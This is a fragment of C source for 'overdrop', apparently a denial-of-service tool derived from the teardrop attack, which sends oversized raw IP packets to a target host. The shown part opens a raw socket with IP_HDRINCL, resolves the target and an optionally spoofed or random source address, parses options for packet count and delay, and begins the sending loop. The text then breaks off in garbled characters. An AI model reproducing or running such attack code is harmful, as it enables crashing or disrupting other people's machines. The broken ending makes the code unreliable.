u_short src_prt=0,dst_prt=0;
struct in_addr addr;
fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n");
if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc < 2) usage(argv[0]);
if (!(dst_ip=name_resolve(argv[1]))) {
fprintf(stderr,"Can't resolve destination address.\n");
exit(1);
}
while ((i=getopt(argc,argv,"s:n:x"))!=EOF) {
switch (i) {
case 'n':
count = atoi(optarg);
break;
case 's':
if (!(src_ip=name_resolve(optarg))) {
fprintf(stderr,"Can't resolve source address.\n");
exit(1);
}
break;
case 'x':
lag=0;
break;
default:
usage(argv[0]);
break;
}
}
srandom((unsigned)(time((time_t)0)));
if (!count) count=COUNT;
fprintf(stderr,"Sending oversized packets:\nFrom: ");
if (!src_ip) fprintf(stderr," (random)"); else {
addr.s_addr = src_ip;
fprintf(stderr,"%15s",inet_ntoa(addr));
}
addr.s_addr = dst_ip;
fprintf(stderr,"\n To: %15s\n",inet_ntoa(addr));
fprintf(stderr," Amt: %5d\n",count);
fprintf(stderr,"[ ");
for (i=0;i><><><><><><><><><><><><>